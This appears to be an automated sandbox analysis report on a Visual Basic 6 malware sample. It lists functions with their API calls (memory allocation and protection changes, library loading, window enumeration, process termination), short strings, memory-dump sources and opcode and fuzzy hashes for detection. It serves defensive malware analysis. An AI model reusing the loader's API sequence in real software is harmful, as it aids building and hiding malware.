Instruction ID: 80d9438d5741ac93c4414fd94142d8247dc0a5c6e6f82830b2c9891547951d87
Opcode Fuzzy Hash: 3c8faa50bc7a6fbf58bdea1535cfeafc80df8a2332d9c73fd0d59aeacaf475f7
Instruction Fuzzy Hash: E07222B2A04389DFDBB49F38CD917EABBA2FF55300F05815ADD899B210D3705A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02BF087E, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02BF1C83

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: QJQ
API String ID: 1029625771-1123671965
Opcode ID: b8476430e8e40aaf17f4d9c2bf36d9921c7c3f1080ee0bda1ffff81e29240989
Instruction ID: 8036db2884bfa107cb3b5b249cf9c491a4aec98031c782105557146fd101ba11
Opcode Fuzzy Hash: b8476430e8e40aaf17f4d9c2bf36d9921c7c3f1080ee0bda1ffff81e29240989
Instruction Fuzzy Hash: 496212B2604389DFDBB49F38CD917EA7BA2FF55340F05816ADD8A9B210D7305A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02BF557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02BFC2D8: LoadLibraryA.KERNELBASE(D7EA1F99), ref: 02BFD310

NtAllocateVirtualMemory.NTDLL ref: 02BF5BAE

Strings

_, xrefs: 02BF6024

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: 9e486df4b5985bf9311bdf8c4c1781d3481b453823de3202f52c31b9ac3b1f5c
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: B6A1FB31E096869FDB66EF3CDCCCEE67BA6AF41724F4542CC98825B04AD371451AC742

Uniqueness

Uniqueness Score: -1.00%

Function 02C0474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 02C04B4E

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: 377d8593b622b3fc2e9a1a80fe3244d3cece12cf3ef738251f60adc4df2f0859
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: D6710E71A04648CFDB398F25C9D97EA37B2BF85314F51422ACC0A9B294C3358A85CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02BFECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 02BFD310

Strings

Gf8, xrefs: 02BFC7D9

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: acf10de78ef860f3726c2575163a3133956996423656a552ca83f1c1f3d2b298
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: 003157756082888BDFB0DE34CD443FE3A63EF94310F5591AB9E4D57244C3319A8ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C04084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02C04233

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: c067192b32edc2329861d3a7c6841f9f47b0db8855a7a332a612882f808f03f5
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: E51125714143949FDF38CF68CD94AE6BBA8FF89320F4481AEDD966B245D3705A02CB14

Uniqueness

Uniqueness Score: -1.00%

Function 02BF4B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 02BF4EB1

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: 257dd4384511a93318ea5116bb547583e82e0c5aa63687d67049aaa445bfaf2f
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: C6113132988300DFC7986EA0C9056EBBBB2FF59390F02480DDCC653510E3340A92CB17

Uniqueness

Uniqueness Score: -1.00%

Function 02BF742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02BE4924), ref: 02BF81A2

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: d92a0ec868262a68581621790d87f638fbf97b5bae829eddd21d70caa9569ef8
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: ECC08C3894250862E9C032F48280B7821118F903C1FCCC0E19F164BE0ECF34C51EBFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0042AC3E, Relevance: 75.7, APIs: 42, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0042AC5C
#526.MSVBVM60(?,00000001,?,?,?,?,004011F6), ref: 0042ACA6
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0042ACCA
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0042ACD9
__vbaNew2.MSVBVM60(0040238C,0042F5B4,00008008,?), ref: 0042AD07
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040237C,00000014,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 0042AD69
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000B8,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 0042ADC8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0042ADEA
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 0042AE00
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AE09
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AE13
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AE1B
__vbaNew2.MSVBVM60(00401BAC,0042F010,?,?,00000001,00000001,00000001), ref: 0042AE3A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 0042AE73
__vbaHresultCheckObj.MSVBVM60(00000000,?,004023AC,00000110), ref: 0042AEBD
#532.MSVBVM60(?), ref: 0042AED4
__vbaFreeStr.MSVBVM60(?), ref: 0042AEDC
__vbaFreeObj.MSVBVM60(?), ref: 0042AEE4
__vbaBoolStr.MSVBVM60(True,00008008,?), ref: 0042AEF5
__vbaNew2.MSVBVM60(0040238C,0042F5B4,True,00008008,?), ref: 0042AF1E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040237C,00000014), ref: 0042AF80
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AFDC
__vbaStrMove.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042B006
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042B00E
__vbaNew2.MSVBVM60(0040238C,0042F5B4), ref: 0042B02D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040237C,0000004C), ref: 0042B08F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042B0E1
__vbaFreeObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042B0F8
__vbaFpI4.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042B10A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,00000064), ref: 0042B13C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,000002B4), ref: 0042B189
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402258,000006F8), ref: 0042B202
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402258,000006FC), ref: 0042B26B
__vbaOnError.MSVBVM60(000000FF), ref: 0042B288
__vbaVarMove.MSVBVM60(000000FF), ref: 0042B2BD
__vbaVarMove.MSVBVM60(000000FF), ref: 0042B2E6
__vbaVarIdiv.MSVBVM60(?,00000001,?,000000FF), ref: 0042B2FE
__vbaI4Var.MSVBVM60(00000000,?,00000001,?,000000FF), ref: 0042B304
__vbaFreeVar.MSVBVM60(0042B36B), ref: 0042B34D
__vbaFreeStr.MSVBVM60(0042B36B), ref: 0042B355
__vbaFreeStr.MSVBVM60(0042B36B), ref: 0042B35D
__vbaFreeVar.MSVBVM60(0042B36B), ref: 0042B365

Strings

True, xrefs: 0042AEF0

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$Move$New2$#526#532#539BoolChkstkErrorIdiv
String ID: True
API String ID: 184932235-1573839795
Opcode ID: 341ca83123d38b726386d7389c190aaa7447f3007f861a4ac4cbfcb76b49abc8
Instruction ID: 69da50e412ea75792312df9287793d50fe00ff02032f5454a44a827cca003f6d
Opcode Fuzzy Hash: 341ca83123d38b726386d7389c190aaa7447f3007f861a4ac4cbfcb76b49abc8
Instruction Fuzzy Hash: 1D12E670A00228EFDB20DFA0DD45B9DBBB4BF05304F5080EAE509BB2A1D7785A99DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0042B56A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 0042B5C7
#557.MSVBVM60(?), ref: 0042B5D0
__vbaFreeVar.MSVBVM60(?), ref: 0042B5E6
#706.MSVBVM60(00000001,00000000,00000000,?), ref: 0042B5F8
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,?), ref: 0042B602
__vbaNew2.MSVBVM60(0040238C,0042F5B4,00000001,00000000,00000000,?), ref: 0042B619
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,00000014), ref: 0042B63D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,00000070), ref: 0042B660
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,00000070), ref: 0042B668
#568.MSVBVM60(00000050), ref: 0042B66F
__vbaFreeStr.MSVBVM60(0042B69C,?), ref: 0042B696

Strings

6/6/6, xrefs: 0042B5B9

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#557#568#706MoveNew2
String ID: 6/6/6
API String ID: 2852487234-3981586821
Opcode ID: fe552b38c71a01a0ad5f5299f35e47a8982bf7555799bb975f3d1df285c53d6d
Instruction ID: 712bf853cff5dfd8145d8f0bfec23aa8ccb555fdc4f873a6ce82290e0030f978
Opcode Fuzzy Hash: fe552b38c71a01a0ad5f5299f35e47a8982bf7555799bb975f3d1df285c53d6d
Instruction Fuzzy Hash: 78316F70900208ABCB10EFA5C946EDEBBB8EF54704F54412FF500B72E1DBB854458A59

Uniqueness

Uniqueness Score: -1.00%

Function 0042DDBB, Relevance: 10.6, APIs: 7, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,?), ref: 0042DDF6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,00000058), ref: 0042DE14
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0042DE1E
#644.MSVBVM60(?,?,?), ref: 0042DE27
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0042DE37
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,000002B0), ref: 0042DE97
__vbaFreeObj.MSVBVM60(0042DEB5), ref: 0042DEAF

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AddrefCheckFreeHresult$#644
String ID:
API String ID: 2435434276-0
Opcode ID: 53607bf75bc99b23afeb9da8c1bc90f2403e677190e0153709e265634757d4bb
Instruction ID: 90da51dd7aceaa3823aed1aeb58183574e6596ec788cb56faabdec89c21cb11b
Opcode Fuzzy Hash: 53607bf75bc99b23afeb9da8c1bc90f2403e677190e0153709e265634757d4bb
Instruction Fuzzy Hash: AF218FB1D00628ABCB01EFA9DD86E9F77BCEF08704F10051EF800BB191D778A90486A9

Uniqueness

Uniqueness Score: -1.00%

Function 02BE267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02BE2687

Strings

E, xrefs: 02BE27D4
Guc, xrefs: 02BE2694

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: 3579447ecfc5cbd620d6e906f8d94b3be1e3bd02504e27347b1426530bb71057
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: DA71C632D096858FDB56EF7CD8CDDD6BBA6AE42624F1482CCD4834A40BE232551BC652

Uniqueness

Uniqueness Score: -1.00%

Function 0040137C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401381

Strings

VB5!6&*, xrefs: 0040137C

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4da97669c24223af7e20f1ee1008f27728f2318579157f224f4739836853dc8f
Instruction ID: 0a4777c414aa070b0a3d6bafd7df09a233e2f0d89c05d0a80e26a570885920e4
Opcode Fuzzy Hash: 4da97669c24223af7e20f1ee1008f27728f2318579157f224f4739836853dc8f
Instruction Fuzzy Hash: FE51566640E7C04FD7134B7489B91A5BFB0AE2771431A06EBC8C19F5B3D22C681BD726

Uniqueness

Uniqueness Score: -1.00%

Function 02BFC2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 02BFD310

Strings

Gf8, xrefs: 02BFC7D9

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: 7a329fd25117eca3005cda74a1c97fa912e543258bd99b59a691a19da63ac16b
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: D521B27050C289CBDFB4DE288D547FD3A62AF94310F4055AB9E1E9B254C7319689CB53

Uniqueness

Uniqueness Score: -1.00%

Function 02BE5FE9, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-8FEA7603), ref: 02BF4692

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction ID: 814d940054deb7f4979bd11a45e7d356699d7f923c8132dd590483af6cac618c
Opcode Fuzzy Hash: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction Fuzzy Hash: 554122324083C59BCB228B3888053DABFB5AF03308F5A45DEC9958BA93D336555FC752

Uniqueness

Uniqueness Score: -1.00%

Function 02BF503B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02BE4924), ref: 02BF81A2

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction ID: 2c9809743217ecd0cb020dbf21b1c16a4567a4a143d48905c35d301532212fe8
Opcode Fuzzy Hash: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction Fuzzy Hash: F111E536E04445DFDB62FF7CD8C8EE6BBA6AF42B14B105288D4825B50AD732851BCB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02BF6BF6, Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

XD;, xrefs: 02BF646C

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: XD;
API String ID: 0-1827544411
Opcode ID: 540f21c433227036eb714c4cc06471b5a8db81d2344e798cb69ba56a66a2e248
Instruction ID: d417ce230a0281a6bc3a347517e8c2e25a57365d827ea3ca6d579ae89be80c24
Opcode Fuzzy Hash: 540f21c433227036eb714c4cc06471b5a8db81d2344e798cb69ba56a66a2e248
Instruction Fuzzy Hash: 50B1FD3150838ADFCB799E74CD91BEA3BB6EF45300F44416EDE8A9B211D7304A42DB12

Uniqueness

Uniqueness Score: -1.00%

Function 02BFE400, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

.q, xrefs: 02BFE6B3

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: .q
API String ID: 0-1843157625
Opcode ID: 9d0cab120b8f8105f530a00bb67a049ed9d8fa757e9b49c56acb3e50085b8ba5
Instruction ID: 8fa96ea9a591b5bf5a6585adc8b917b85085857b387954eaa40b90c2a67190d6
Opcode Fuzzy Hash: 9d0cab120b8f8105f530a00bb67a049ed9d8fa757e9b49c56acb3e50085b8ba5
Instruction Fuzzy Hash: 1921957560438ADBDB70DF68C484AFA63D2FF29700F9941ADDE858B225E730994AC706

Uniqueness

Uniqueness Score: -1.00%

Function 02BE4AA2, Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9fd8b9ca9c29a03a701d3492743c7a2ce2928034376e6bf198f23879d5c41ac8
Instruction ID: b7716ed6df51c4175a28961c0e2d8a0817cfa5ff0d2ba53a17282b26ee882c61
Opcode Fuzzy Hash: 9fd8b9ca9c29a03a701d3492743c7a2ce2928034376e6bf198f23879d5c41ac8
Instruction Fuzzy Hash: C6E1D832E189858FCB57EF3CD8CCDE6BBA6AE42624F5543CCE4834A44BD231551BC686

Uniqueness

Uniqueness Score: -1.00%

Function 02BF00C6, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ffd7e6884c61650175069a6e40082e834981f748c3cae0a522c2991f181201
Instruction ID: 9ee8be4412065a82d7410acdb49fd0668652d8ced6975f800745d577ab9b798e
Opcode Fuzzy Hash: e8ffd7e6884c61650175069a6e40082e834981f748c3cae0a522c2991f181201
Instruction Fuzzy Hash: 22413575500348CBDBB8DE218DD13EB33A3AF88304F44896ECE0A0B26ED731A545CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02BFE990, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec5e0dfa2a00e97126cfe487e842c2f33f8182f52d0c83a80d4e9c4153ad272
Instruction ID: 6054470301236c7de04a77668008905a546fadba4cec4e0dc1f9e4f523d59d86
Opcode Fuzzy Hash: aec5e0dfa2a00e97126cfe487e842c2f33f8182f52d0c83a80d4e9c4153ad272
Instruction Fuzzy Hash: 98012D75604248CFC7B1DF24C9C4AE973B1BF98350F5540A9DA198B321C730E945DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02BF46A0, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a7b69c8dfc7ed44161c76ebc926b6c030e5a45655e04daf85073892828f8af
Instruction ID: 9b198b8e31deeb6f4b2c207cfc0bcab5c4fbf7fa364c3361673f7de07de9c90b
Opcode Fuzzy Hash: 95a7b69c8dfc7ed44161c76ebc926b6c030e5a45655e04daf85073892828f8af
Instruction Fuzzy Hash: 20C092FA601581CFEF06CB48D581B4473B0FB48B48F0808D0E002CF712C224E900CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02BFFBA1, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02BFC054, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0042A934, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

#526.MSVBVM60(?,00000001), ref: 0042A994
__vbaVarTstNe.MSVBVM60(?,?,?,00000001), ref: 0042A9AF
__vbaFreeVar.MSVBVM60(?,?,?,00000001), ref: 0042A9BA
__vbaNew2.MSVBVM60(0040238C,0042F5B4,?,?,?,00000001), ref: 0042A9DA
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,00000014), ref: 0042A9FE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000B8), ref: 0042AA27
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,000000B8), ref: 0042AA2F
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 0042AA3B
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AA44
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AA4E
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AA56
__vbaNew2.MSVBVM60(00401BAC,0042F010,?,?,00000001,00000001,00000001), ref: 0042AA6E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042AA86
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004023AC,00000110), ref: 0042AAAC
#532.MSVBVM60(?), ref: 0042AAB4
__vbaFreeStr.MSVBVM60(?), ref: 0042AABC
__vbaFreeObj.MSVBVM60(?), ref: 0042AAC4
__vbaBoolStr.MSVBVM60(True,?,?,?,00000001), ref: 0042AACE
__vbaNew2.MSVBVM60(0040238C,0042F5B4,True,?,?,?,00000001), ref: 0042AAEF
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,00000014), ref: 0042AB13
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AB3C
__vbaStrMove.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AB4A
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AB52
__vbaNew2.MSVBVM60(0040238C,0042F5B4), ref: 0042AB69
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,0000004C), ref: 0042AB8D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042ABAC
__vbaFreeObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042ABB4
__vbaFpI4.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042ABC4
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,00402228,00000064), ref: 0042ABDD
__vbaFreeStr.MSVBVM60(0042AC21,True,?,?,?,00000001), ref: 0042AC13

Strings

True, xrefs: 0042AAC9

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$Move$#526#532#539Bool
String ID: True
API String ID: 2916232083-1573839795
Opcode ID: d21ac2f9756c34b8a74d765d9b1e185aaeb5d1cd4a6e170515e59d43617b618e
Instruction ID: eee5ac21ca96bd58c219fff64775f251e41dda24355e8548afabaa71934d1f9b
Opcode Fuzzy Hash: d21ac2f9756c34b8a74d765d9b1e185aaeb5d1cd4a6e170515e59d43617b618e
Instruction Fuzzy Hash: 62819271A40214ABDB10EFA1D98AEDE7BB8EF58314F94043BF900B71E1D7786945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042B38A, Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

#512.MSVBVM60(00402418,00000002), ref: 0042B3CA
__vbaStrMove.MSVBVM60(00402418,00000002), ref: 0042B3D4
__vbaStrCmp.MSVBVM60(00402424,00000000,00402418,00000002), ref: 0042B3DF
